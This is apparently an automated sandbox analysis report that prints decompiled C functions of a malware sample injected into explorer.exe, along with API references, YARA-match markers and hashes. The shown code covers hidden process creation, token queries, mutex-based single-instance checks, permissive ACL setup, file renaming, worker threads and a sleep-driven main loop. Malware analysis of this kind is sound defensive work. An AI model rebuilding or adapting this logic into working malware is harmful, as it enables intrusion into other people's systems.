                                          					_v92.wShowWindow = 0;
                                          				}
                                          				asm("sbb eax, eax");
                                          				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
                                          					_t44 = 0;
                                          				} else {
                                          					if(_a8 != 0) {
                                          						_push(_a12);
                                          						_t34 =  *0x9e684; // 0x34f8f0
                                          						_push(_v20.hProcess);
                                          						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
                                          							GetExitCodeProcess(_v20.hProcess, _a8);
                                          						}
                                          					}
                                          					_t30 =  *0x9e684; // 0x34f8f0
                                          					 *((intOrPtr*)(_t30 + 0x30))(_v20.hThread);
                                          					_t32 =  *0x9e684; // 0x34f8f0
                                          					 *((intOrPtr*)(_t32 + 0x30))(_v20);
                                          				}
                                          				return _t44;
                                          			}

                                          APIs
                                          • memset.MSVCRT ref: 0008A925
                                          • CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,0008C1AB,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 0008A96C
                                          • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0008A990
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CodeCreateExitmemset
                                          • String ID:
                                          • API String ID: 4170947310-0
                                          • Opcode ID: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
                                          • Instruction ID: 69c2d589c2e0a2c9629c015d340a78d4e10d2ecd89ef4d1a65b39d481363986c
                                          • Opcode Fuzzy Hash: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
                                          • Instruction Fuzzy Hash: C0215C72A00118BFEF519FA9DC84EAFBBBCFF08380B014426FA55E6560D6349C00CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E0008B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                          				long _v8;
                                          				void* _v12;
                                          				void* _t12;
                                          				void* _t20;
                                          				void* _t22;
                                          				union _TOKEN_INFORMATION_CLASS _t28;
                                          				void* _t31;
                                          
                                          				_push(_t22);
                                          				_push(_t22);
                                          				_t31 = 0;
                                          				_t28 = __edx;
                                          				_t20 = _t22;
                                          				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                          					L6:
                                          					_t12 = _t31;
                                          				} else {
                                          					_t31 = E00088604(_v8);
                                          					_v12 = _t31;
                                          					if(_t31 != 0) {
                                          						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                          							goto L6;
                                          						} else {
                                          							E0008861A( &_v12, _t16);
                                          							goto L3;
                                          						}
                                          					} else {
                                          						L3:
                                          						_t12 = 0;
                                          					}
                                          				}
                                          				return _t12;
                                          			}

                                          APIs
                                          • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9B3
                                          • GetLastError.KERNEL32(?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9BA
                                            • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                          • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9E9
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InformationToken$AllocateErrorHeapLast
                                          • String ID:
                                          • API String ID: 2499131667-0
                                          • Opcode ID: 58d5a4d227ababbac2af2871f3b2c126f10e885371167daa7ee16d967e8deb72
                                          • Instruction ID: 50b00f07447128573cf446961854993498285b3da02e0cb9ad280b6d8ca9cbf5
                                          • Opcode Fuzzy Hash: 58d5a4d227ababbac2af2871f3b2c126f10e885371167daa7ee16d967e8deb72
                                          • Instruction Fuzzy Hash: 62016272600118BF9B64ABAADC49DAB7FECFF457A17110666F685D3211EB34DD0087A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0008590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
                                          				intOrPtr _t10;
                                          				void* _t13;
                                          				void* _t19;
                                          				signed int _t21;
                                          				signed int _t22;
                                          
                                          				_t13 = __edx;
                                          				if(__ecx != 0) {
                                          					_t22 = 0;
                                          					_t19 = CreateMutexA(0, 1, __ecx);
                                          					if(_t19 != 0) {
                                          						if(GetLastError() != 0xb7 || E0008A4BF(_t19, _t13) != 0xffffffff) {
                                          							_t22 = 1;
                                          							 *_a4 = _t19;
                                          						} else {
                                          							_t10 =  *0x9e684; // 0x34f8f0
                                          							 *((intOrPtr*)(_t10 + 0x30))(_t19);
                                          						}
                                          					} else {
                                          						GetLastError();
                                          						_t22 = 0xffffffff;
                                          					}
                                          				} else {
                                          					_t22 = _t21 | 0xffffffff;
                                          				}
                                          				return _t22;
                                          			}

                                          APIs
                                          • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085928
                                          • GetLastError.KERNEL32(?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085934
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateErrorLastMutex
                                          • String ID:
                                          • API String ID: 1925916568-0
                                          • Opcode ID: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                                          • Instruction ID: 1c4491eb415752db81424c57f385e659120548c2048b1677d1101b25907139c6
                                          • Opcode Fuzzy Hash: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                                          • Instruction Fuzzy Hash: 3FF02831600910CBEA20276ADC4497E76D8FBE6772B510322F9E9D72D0DF748C0543A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0008A471(CHAR* __ecx, void* __edx) {
                                          				intOrPtr _t8;
                                          				void* _t16;
                                          				void* _t17;
                                          
                                          				_t16 = __edx; // executed
                                          				_t17 = CreateMutexA(0, 1, __ecx);
                                          				if(_t17 != 0) {
                                          					if(GetLastError() == 0xb7 && E0008A4BF(_t17, _t16) < 0) {
                                          						_t8 =  *0x9e684; // 0x34f8f0
                                          						 *((intOrPtr*)(_t8 + 0x30))(_t17);
                                          						_t17 = 0;
                                          					}
                                          					return _t17;
                                          				}
                                          				GetLastError();
                                          				return 0;
                                          			}






                                          APIs
                                          • CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,00084E14,00000000), ref: 0008A47F
                                          • GetLastError.KERNEL32 ref: 0008A48B
                                          • GetLastError.KERNEL32 ref: 0008A495
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$CreateMutex
                                          • String ID:
                                          • API String ID: 200418032-0
                                          • Opcode ID: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
                                          • Instruction ID: e0de8723e9178c59a55691960d7167cf6849532d0ff7e7a54eb44961aa7457b0
                                          • Opcode Fuzzy Hash: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
                                          • Instruction Fuzzy Hash: 19F0E5323000209BFA2127A4D84CB5F3695FFDA7A0F025463F645CB621EAECCC0683B2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 91%
                                          			E00086DA0(void* __eflags, void* __fp0) {
                                          				short _v536;
                                          				WCHAR* _v544;
                                          				WCHAR* _t9;
                                          				intOrPtr _t10;
                                          				intOrPtr _t11;
                                          				void* _t22;
                                          				void* _t32;
                                          				intOrPtr _t34;
                                          				intOrPtr _t35;
                                          				intOrPtr _t41;
                                          				intOrPtr _t43;
                                          				intOrPtr _t46;
                                          				intOrPtr _t49;
                                          				void* _t51;
                                          				void* _t53;
                                          				void* _t56;
                                          				WCHAR* _t59;
                                          				signed int _t60;
                                          				void* _t62;
                                          				void* _t63;
                                          				void* _t74;
                                          
                                          				_t74 = __fp0;
                                          				_t34 =  *0x9e778; // 0x34fc18
                                          				_t62 = (_t60 & 0xfffffff8) - 0x21c;
                                          				_t51 = 0x31;
                                          				_t32 = 1; // executed
                                          				_t9 = E00089ED0(_t34, _t51); // executed
                                          				if(_t9 != 0) {
                                          					_t10 =  *0x9e78c; // 0x0
                                          					_t66 = _t10;
                                          					if(_t10 == 0) {
                                          						_t49 =  *0x9e688; // 0xb0000
                                          						_t10 = E0008EDCF(_t49 + 0xb0, _t51, _t66);
                                          						 *0x9e78c = _t10;
                                          					}
                                          					_push(0);
                                          					_push(_t10);
                                          					_t11 =  *0x9e688; // 0xb0000
                                          					_push(L"\\c");
                                          					_t9 = E000892E5(_t11 + 0x438);
                                          					_t59 = _t9;
                                          					_t63 = _t62 + 0x10;
                                          					_v544 = _t59;
                                          					if(_t59 != 0) {
                                          						while(1) {
                                          							_t35 =  *0x9e688; // 0xb0000
                                          							_t56 = E0008A471(_t35 + 0x1878, 0x1388);
                                          							if(_t56 == 0) {
                                          								break;
                                          							}
                                          							if(E0008B269(_t59) == 0) {
                                          								_t32 = E0008F14F(_t59, 0x1388, _t74);
                                          							}
                                          							E0008A4DB(_t56);
                                          							_t41 =  *0x9e684; // 0x34f8f0
                                          							 *((intOrPtr*)(_t41 + 0x30))(_t56);
                                          							if(_t32 > 0) {
                                          								E0008980C( &_v544);
                                          								_t43 =  *0x9e778; // 0x34fc18
                                          								_t53 = 0x33;
                                          								if(E00089ED0(_t43, _t53) != 0) {
                                          									L12:
                                          									__eflags = E00081C68(_t59, __eflags, _t74);
                                          									if(__eflags >= 0) {
                                          										E0008B1B1(_t59, _t53, __eflags, _t74);
                                          										continue;
                                          									}
                                          								} else {
                                          									_t46 =  *0x9e778; // 0x34fc18
                                          									_t53 = 0x12;
                                          									_t22 = E00089ED0(_t46, _t53);
                                          									_t72 = _t22;
                                          									if(_t22 != 0 || E0008A4EF(_t53, _t72) != 0) {
                                          										_push(E0008980C(0));
                                          										E00089640( &_v536, 0x104, L"%s.%u", _t59);
                                          										_t63 = _t63 + 0x14;
                                          										MoveFileW(_t59,  &_v536);
                                          										continue;
                                          									} else {
                                          										goto L12;
                                          									}
                                          								}
                                          							}
                                          							break;
                                          						}
                                          						_t9 = E0008861A( &_v544, 0xfffffffe);
                                          					}
                                          				}
                                          				return _t9;
                                          			}
























                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileMove
                                          • String ID: %s.%u
                                          • API String ID: 3562171763-1288070821
                                          • Opcode ID: 421a485327c9563d6243980d6a9faad7c7a1b283adcb3d3b1c47cb7f55d407e9
                                          • Instruction ID: a5438fa8a69558a9aa6e28972bce87c3de03cd7a9a26965d290b63cd5faf2151
                                          • Opcode Fuzzy Hash: 421a485327c9563d6243980d6a9faad7c7a1b283adcb3d3b1c47cb7f55d407e9
                                          • Instruction Fuzzy Hash: FE31EF753043105AFA54FB74DC86ABE3399FB90750F14002AFA828B283EF26CD01C752
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 89%
                                          			E00082AEA() {
                                          				intOrPtr _v8;
                                          				signed int _v12;
                                          				CHAR* _v16;
                                          				signed int _t16;
                                          				intOrPtr _t21;
                                          				intOrPtr _t22;
                                          				void* _t26;
                                          				void* _t29;
                                          				signed int _t31;
                                          				intOrPtr _t36;
                                          				CHAR* _t38;
                                          				intOrPtr _t39;
                                          				void* _t40;
                                          
                                          				_t15 =  *0x9e710 * 0x64;
                                          				_t39 = 0;
                                          				_v12 =  *0x9e710 * 0x64;
                                          				_t16 = E00088604(_t15);
                                          				_t38 = _t16;
                                          				_v16 = _t38;
                                          				if(_t38 != 0) {
                                          					_t31 =  *0x9e710; // 0x2
                                          					_t36 = 0;
                                          					_v8 = 0;
                                          					if(_t31 == 0) {
                                          						L9:
                                          						_push(_t38);
                                          						E00089F48(0xe); // executed
                                          						E0008861A( &_v16, _t39);
                                          						return 0;
                                          					}
                                          					_t29 = 0;
                                          					do {
                                          						_t21 =  *0x9e714; // 0x34fe88
                                          						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
                                          							if(_t39 != 0) {
                                          								lstrcatA(_t38, "|");
                                          								_t39 = _t39 + 1;
                                          							}
                                          							_t22 =  *0x9e714; // 0x34fe88
                                          							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
                                          							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
                                          							_t26 = E00089601( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
                                          							_t31 =  *0x9e710; // 0x2
                                          							_t40 = _t40 + 0x18;
                                          							_t36 = _v8;
                                          							_t39 = _t39 + _t26;
                                          						}
                                          						_t36 = _t36 + 1;
                                          						_t29 = _t29 + 0x20;
                                          						_v8 = _t36;
                                          					} while (_t36 < _t31);
                                          					goto L9;
                                          				}
                                          				return _t16 | 0xffffffff;
                                          			}
















                                          APIs
                                            • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                                          • lstrcatA.KERNEL32(00000000,0009B9A0,0008573E,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,0008573E), ref: 00082B3D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeaplstrcat
                                          • String ID: %u;%u;%u
                                          • API String ID: 3011335133-2973439046
                                          • Opcode ID: 42a2cadbc932a715926ff7222a2c2e5f4bd2b5e85362bffd8c295efa13a93fe6
                                          • Instruction ID: 5a0a3936677ef0304e341d4e43594f78b37864cc0fc2619589e6b45d54e6a73c
                                          • Opcode Fuzzy Hash: 42a2cadbc932a715926ff7222a2c2e5f4bd2b5e85362bffd8c295efa13a93fe6
                                          • Instruction Fuzzy Hash: 7111E132A05300EBDB14EFE9EC85DAABBA9FB84324B10442AE50097191DB349900CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 59%
                                          			E0008BD10() {
                                          				char _v8;
                                          				void* _v12;
                                          				char _v16;
                                          				short _v20;
                                          				char _v24;
                                          				short _v28;
                                          				char _v32;
                                          				intOrPtr _v36;
                                          				intOrPtr _v40;
                                          				intOrPtr _v44;
                                          				intOrPtr _v56;
                                          				intOrPtr _v60;
                                          				intOrPtr _v64;
                                          				intOrPtr _v68;
                                          				intOrPtr _v72;
                                          				intOrPtr _v76;
                                          				intOrPtr _v88;
                                          				intOrPtr _v92;
                                          				void _v96;
                                          				intOrPtr _t58;
                                          				intOrPtr _t61;
                                          				intOrPtr _t63;
                                          				intOrPtr _t65;
                                          				intOrPtr _t67;
                                          				intOrPtr _t70;
                                          				intOrPtr _t73;
                                          				intOrPtr _t77;
                                          				intOrPtr _t79;
                                          				intOrPtr _t81;
                                          				intOrPtr _t85;
                                          				intOrPtr _t87;
                                          				signed int _t90;
                                          				void* _t92;
                                          				intOrPtr _t93;
                                          				void* _t98;
                                          
                                          				_t90 = 8;
                                          				_v28 = 0xf00;
                                          				_v32 = 0;
                                          				_v24 = 0;
                                          				memset( &_v96, 0, _t90 << 2);
                                          				_v20 = 0x100;
                                          				_push( &_v12);
                                          				_push(0);
                                          				_push(0);
                                          				_push(0);
                                          				_push(0);
                                          				_push(0);
                                          				_push(0);
                                          				_push(0);
                                          				_v16 = 0;
                                          				_push(0);
                                          				_v8 = 0;
                                          				_push(1);
                                          				_v12 = 0;
                                          				_push( &_v24);
                                          				_t58 =  *0x9e68c; // 0x34fab8
                                          				_t98 = 0;
                                          				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
                                          					L14:
                                          					if(_v8 != 0) {
                                          						_t67 =  *0x9e68c; // 0x34fab8
                                          						 *((intOrPtr*)(_t67 + 0x10))(_v8);
                                          					}
                                          					if(_v12 != 0) {
                                          						_t65 =  *0x9e68c; // 0x34fab8
                                          						 *((intOrPtr*)(_t65 + 0x10))(_v12);
                                          					}
                                          					if(_t98 != 0) {
                                          						_t63 =  *0x9e684; // 0x34f8f0
                                          						 *((intOrPtr*)(_t63 + 0x34))(_t98);
                                          					}
                                          					if(_v16 != 0) {
                                          						_t61 =  *0x9e684; // 0x34f8f0
                                          						 *((intOrPtr*)(_t61 + 0x34))(_v16);
                                          					}
                                          					L22:
                                          					return _t98;
                                          				}
                                          				_v68 = _v12;
                                          				_t70 =  *0x9e688; // 0xb0000
                                          				_t92 = 2;
                                          				_v96 = 0x1fffff;
                                          				_v92 = 0;
                                          				_v88 = 3;
                                          				_v76 = 0;
                                          				_v72 = 5;
                                          				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
                                          					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
                                          						goto L7;
                                          					}
                                          					goto L4;
                                          				} else {
                                          					L4:
                                          					_push( &_v8);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(1);
                                          					_push(_t92);
                                          					_push(_t92);
                                          					_push( &_v32);
                                          					_t85 =  *0x9e68c; // 0x34fab8
                                          					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
                                          						goto L14;
                                          					} else {
                                          						_t87 = _v8;
                                          						if(_t87 != 0) {
                                          							_push(2);
                                          							_pop(1);
                                          							_v64 = 0x1fffff;
                                          							_v60 = 1;
                                          							_v56 = 3;
                                          							_v44 = 0;
                                          							_v40 = 1;
                                          							_v36 = _t87;
                                          						}
                                          						L7:
                                          						_push( &_v16);
                                          						_push(0);
                                          						_push( &_v96);
                                          						_t73 =  *0x9e68c; // 0x34fab8
                                          						_push(1); // executed
                                          						if( *((intOrPtr*)(_t73 + 8))() != 0) {
                                          							goto L14;
                                          						}
                                          						_t98 = LocalAlloc(0x40, 0x14);
                                          						if(_t98 == 0) {
                                          							goto L14;
                                          						}
                                          						_t93 =  *0x9e68c; // 0x34fab8
                                          						_push(1);
                                          						_push(_t98);
                                          						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
                                          							goto L14;
                                          						}
                                          						_t77 =  *0x9e68c; // 0x34fab8
                                          						_push(0);
                                          						_push(_v16);
                                          						_push(1);
                                          						_push(_t98);
                                          						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
                                          							goto L14;
                                          						}
                                          						if(_v8 != 0) {
                                          							_t81 =  *0x9e68c; // 0x34fab8
                                          							 *((intOrPtr*)(_t81 + 0x10))(_v8);
                                          						}
                                          						_t79 =  *0x9e68c; // 0x34fab8
                                          						 *((intOrPtr*)(_t79 + 0x10))(_v12);
                                          						goto L22;
                                          					}
                                          				}
                                          			}


                                          APIs
                                          • SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 0008BDF7
                                          • LocalAlloc.KERNEL32(00000040,00000014), ref: 0008BE02
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocEntriesLocal
                                          • String ID:
                                          • API String ID: 2146116654-0
                                          • Opcode ID: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
                                          • Instruction ID: 3aa66279fdb8b3e8acfe9a35cde7f6eb8d9a09b5f03ef1515584b77c0f26ffcf
                                          • Opcode Fuzzy Hash: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
                                          • Instruction Fuzzy Hash: C3512A71A00248EFEB64DF99D888ADEBBF8FF44704F15806AF604AB260D7749D45CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E000898EE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _t45;
                                          				intOrPtr _t46;
                                          				intOrPtr _t48;
                                          				intOrPtr _t49;
                                          				void* _t52;
                                          				intOrPtr _t53;
                                          				intOrPtr _t54;
                                          				struct _SECURITY_ATTRIBUTES* _t58;
                                          				intOrPtr _t59;
                                          				intOrPtr _t61;
                                          				intOrPtr _t65;
                                          				intOrPtr _t66;
                                          				intOrPtr _t67;
                                          				intOrPtr _t69;
                                          				struct _SECURITY_ATTRIBUTES* _t73;
                                          				intOrPtr _t74;
                                          				intOrPtr _t77;
                                          				intOrPtr _t78;
                                          				intOrPtr _t79;
                                          				intOrPtr _t82;
                                          				intOrPtr _t83;
                                          				void* _t86;
                                          				intOrPtr _t87;
                                          				intOrPtr _t89;
                                          				signed int _t92;
                                          				intOrPtr _t97;
                                          				intOrPtr _t98;
                                          				int _t106;
                                          				intOrPtr _t110;
                                          				signed int _t112;
                                          				signed int _t113;
                                          				void* _t115;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_v8 = __edx;
                                          				_v12 = __ecx;
                                          				_t77 =  *0x9e76c; // 0x1d0
                                          				_t73 = 0;
                                          				if(E0008A4BF(_t77, 0x7530) >= 0) {
                                          					_t45 =  *0x9e770; // 0x330c20
                                          					_t112 = 0;
                                          					_t106 = 0;
                                          					do {
                                          						_t78 =  *((intOrPtr*)(_t106 + _t45));
                                          						if(_t78 == 0) {
                                          							L6:
                                          							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
                                          								_t113 = _t112 << 5;
                                          								if(_v8 == _t73) {
                                          									 *(_t113 + _t45 + 0x10) = _t73;
                                          									_t46 =  *0x9e770; // 0x330c20
                                          									 *(_t113 + _t46 + 0xc) = _t73;
                                          									L14:
                                          									_t79 =  *0x9e770; // 0x330c20
                                          									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
                                          									_t48 =  *0x9e770; // 0x330c20
                                          									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
                                          									_t49 = E0008A471(0, 1);
                                          									_t82 =  *0x9e770; // 0x330c20
                                          									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
                                          									_t83 =  *0x9e770; // 0x330c20
                                          									_t30 = _t83 + _t113 + 4; // 0x330c24
                                          									_t52 = CreateThread(_t73, _t73, E000898A6, _t83 + _t113, _t73, _t30);
                                          									_t53 =  *0x9e770; // 0x330c20
                                          									 *(_t113 + _t53) = _t52;
                                          									_t54 =  *0x9e770; // 0x330c20
                                          									_t86 =  *(_t113 + _t54);
                                          									if(_t86 != 0) {
                                          										SetThreadPriority(_t86, 0xffffffff);
                                          										_t87 =  *0x9e770; // 0x330c20
                                          										 *0x9e774 =  *0x9e774 + 1;
                                          										E0008A4DB( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
                                          										_t74 =  *0x9e770; // 0x330c20
                                          										_t73 = _t74 + _t113;
                                          									} else {
                                          										_t59 =  *0x9e684; // 0x34f8f0
                                          										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
                                          										_t61 =  *0x9e770; // 0x330c20
                                          										_t37 = _t61 + 0xc; // 0x330c2c
                                          										_t91 = _t37 + _t113;
                                          										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
                                          											E0008861A(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
                                          											_t61 =  *0x9e770; // 0x330c20
                                          										}
                                          										_t92 = 8;
                                          										memset(_t113 + _t61, 0, _t92 << 2);
                                          									}
                                          									L19:
                                          									_t89 =  *0x9e76c; // 0x1d0
                                          									E0008A4DB(_t89);
                                          									_t58 = _t73;
                                          									L20:
                                          									return _t58;
                                          								}
                                          								_t110 = _a4;
                                          								_t65 = E00088604(_t110);
                                          								_t97 =  *0x9e770; // 0x330c20
                                          								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
                                          								_t66 =  *0x9e770; // 0x330c20
                                          								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
                                          									goto L19;
                                          								}
                                          								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
                                          								_t67 =  *0x9e770; // 0x330c20
                                          								E000886E1( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
                                          								_t115 = _t115 + 0xc;
                                          								goto L14;
                                          							}
                                          							goto L7;
                                          						}
                                          						_t69 =  *0x9e684; // 0x34f8f0
                                          						_push(_t73);
                                          						_push(_t78);
                                          						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
                                          							_t45 =  *0x9e770; // 0x330c20
                                          							goto L7;
                                          						}
                                          						_t98 =  *0x9e770; // 0x330c20
                                          						E0008984A(_t106 + _t98, 0);
                                          						_t45 =  *0x9e770; // 0x330c20
                                          						goto L6;
                                          						L7:
                                          						_t106 = _t106 + 0x20;
                                          						_t112 = _t112 + 1;
                                          					} while (_t106 < 0x1000);
                                          					goto L19;
                                          				}
                                          				_t58 = 0;
                                          				goto L20;
                                          			}


                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0cadc4244450b856390e4109349fe98e1b04985f9c6077f91c07d36e44fa3e3d
                                          • Instruction ID: 2208b45a903d8e4e3ebf4af7583ef236fbc94e4c18dfd99628fde9c82a46c99b
                                          • Opcode Fuzzy Hash: 0cadc4244450b856390e4109349fe98e1b04985f9c6077f91c07d36e44fa3e3d
                                          • Instruction Fuzzy Hash: 4F515171614640DFEB69EFA8DC84876F7F9FB48314358892EE48687361D735AC02CB42
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E00085631(void* __edx, void* __edi) {
                                          				char _v44;
                                          				void* _t8;
                                          				intOrPtr _t11;
                                          				intOrPtr _t14;
                                          				intOrPtr _t17;
                                          				intOrPtr _t18;
                                          				void* _t20;
                                          				void* _t33;
                                          				void* _t34;
                                          				void* _t36;
                                          				void* _t39;
                                          				void* _t40;
                                          				void* _t49;
                                          				void* _t54;
                                          
                                          				_t54 = __edi;
                                          				_t8 = E00089E66(0x3b); // executed
                                          				if(_t8 != 0xffffffff) {
                                          					L2:
                                          					E0008980C(0x9e6c8);
                                          					_t39 = 0x37; // executed
                                          					E00089F06(_t39);
                                          					_t11 =  *0x9e688; // 0xb0000
                                          					_t40 = 0x3a; // executed
                                          					E00089F06(_t40); // executed
                                          					E0008E4C1(_t63);
                                          					_t14 =  *0x9e688; // 0xb0000
                                          					_t41 =  &_v44;
                                          					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
                                          					E0008A86D( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
                                          					_t17 =  *0x9e684; // 0x34f8f0
                                          					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0x9e6c8,  *0x9e6cc);
                                          					 *0x9e74c = _t18;
                                          					if(_t18 != 0) {
                                          						_t20 = CreateMutexA(0, 0, 0);
                                          						 *0x9e76c = _t20;
                                          						__eflags = _t20;
                                          						if(_t20 != 0) {
                                          							_t34 = E00088604(0x1000); // executed
                                          							_t52 = 0;
                                          							 *0x9e770 = _t34;
                                          							_t49 =  *0x9e774; // 0x2
                                          							__eflags = _t34;
                                          							_t41 =  !=  ? 0 : _t49;
                                          							__eflags = _t41;
                                          							 *0x9e774 = _t41; // executed
                                          						}
                                          						E0008153B(_t41, _t52); // executed
                                          						E000898EE(E00082EDA, 0, __eflags, 0, 0); // executed
                                          						E00083017(); // executed
                                          						E000831C2(0, __eflags); // executed
                                          						E000829B1(); // executed
                                          						E00083BB2(_t54, __eflags); // executed
                                          						while(1) {
                                          							__eflags =  *0x9e758; // 0x0
                                          							if(__eflags != 0) {
                                          								break;
                                          							}
                                          							E0008980C(0x9e750);
                                          							_push(0x9e750);
                                          							_push(0x9e750); // executed
                                          							E0008279B();
                                          							Sleep(0xfa0);
                                          						}
                                          						E00083D34();
                                          						E00089A8E();
                                          						E000834CB();
                                          						_t33 = 0;
                                          						__eflags = 0;
